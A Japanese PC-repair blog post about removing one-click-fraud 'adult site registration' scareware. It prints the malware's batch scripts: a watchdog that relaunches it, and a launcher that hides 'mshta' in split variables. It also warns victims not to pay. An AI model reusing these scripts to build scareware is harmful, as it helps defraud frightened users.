アダルトご利用お知らせ画面がデスクトップに表示。

広島県安芸郡に訪問サポート修理。

1. サポート内容
2. アダルトご利用通知の駆除
3. おわりに

サポート内容

アダルトサイトへのご登録が完了していますので下記をご確認下さいませ。ご利用お知らせ画面がデスクトップに表示されるとご連絡をいただきました。

アダルトご利用通知の駆除

久しぶりにこの手の駆除依頼。一時期、流行っていましたが、ここ最近はめっきり依頼がなかったのでもうなくなったのかと思っていました。それとも、新種の登場か？と少しワクワクしながら作業。

では、駆除開始。以前の駆除方法で、プログラム本体とレジストリ内の情報を検索。ポップアップ表示しているウィンドウ内に駆除する為のヒントあり。

ふむ、進化してない。あっさり見つかる・・・。PCから本体プログラム、レジストリ情報を抹消。

今回、本体プログラムを持って帰ってみた。中身は単純。batファイルからmshatに指定したhtmlデータと、画像を読み込み表示させているだけ。

@ECHO OFF
ping localhost -n 240 > nul
for /f %%z in ('tasklist ^| find /C "mshta"') do set COUNT=%%z
for /f %%z in ('wmic process get commandline /all ^| find "mshta" ^| find /C "mycon"') do set COUNT=%%z
if %COUNT% == 0 goto KICK
if %COUNT% == 1 goto KICK
exit /b
:KICK
"C:\ProgramData\mycon\4F8IF84J.bat"

@ECHO OFF

ping localhost -n 240 > nul

for /f %%z in ('tasklist ^| find /C "mshta"') do set COUNT=%%z

for /f %%z in ('wmic process get commandline /all ^| find "mshta" ^| find /C "mycon"') do set COUNT=%%z

if %COUNT% == 0 goto KICK

if %COUNT% == 1 goto KICK

exit /b

:KICK

"C:\ProgramData\mycon\4F8IF84J.bat"

@ECHO OFF
SET b=s
REM AAAA CCCC 
REM AAAA CCCC 
REM BBBB DDDD 
REM
REM
SET c=h
REM AAAA CCCC 
REM AAAA CCCC 
REM BBBB DDDD 
REM
REM
SET d=t
REM AAAA CCCC 
REM AAAA CCCC 
REM BBBB DDDD 
REM
REM
SET e=a
REM AAAA CCCC 
REM AAAA CCCC 
REM BBBB DDDD 
REM
REM
SET a=m
REM AAAA CCCC 
REM AAAA CCCC 
REM BBBB DDDD 
REM
REM
start %a%%b%%c%%d%%e% "C:\ProgramData\mycon\4F8IF84J.h"

@ECHO OFF

SET b=s

REM AAAA CCCC

REM BBBB DDDD

REM

SET c=h

REM AAAA CCCC

REM BBBB DDDD

REM

SET d=t

REM AAAA CCCC

REM BBBB DDDD

REM

SET e=a

REM AAAA CCCC

REM BBBB DDDD

REM

SET a=m

REM AAAA CCCC

REM BBBB DDDD

REM

start %a%%b%%c%%d%%e% "C:\ProgramData\mycon\4F8IF84J.h"

4F8IF84J.hは、htmlデータです。この中身を変えれば、画像、内容を変える事ができますね。参考までにってことで。これを使って何かあっても一切知りません。自己責任でお願いします。

おわりに

本体プログラムとレジストリ以外に、タスクも調べておきましょう。再起動させたら、また表示されるって場合はタスクに登録され、定期的に自動実行しているかもしれません。

毎回この手の不正プログラムで言う事ですが、お金を払う必要ありません。詐欺ですので、決して電話したり、確認ボタンを押したりしないでください。

お困りでしたら、お気軽にお問い合わせ下さい。対応いたします。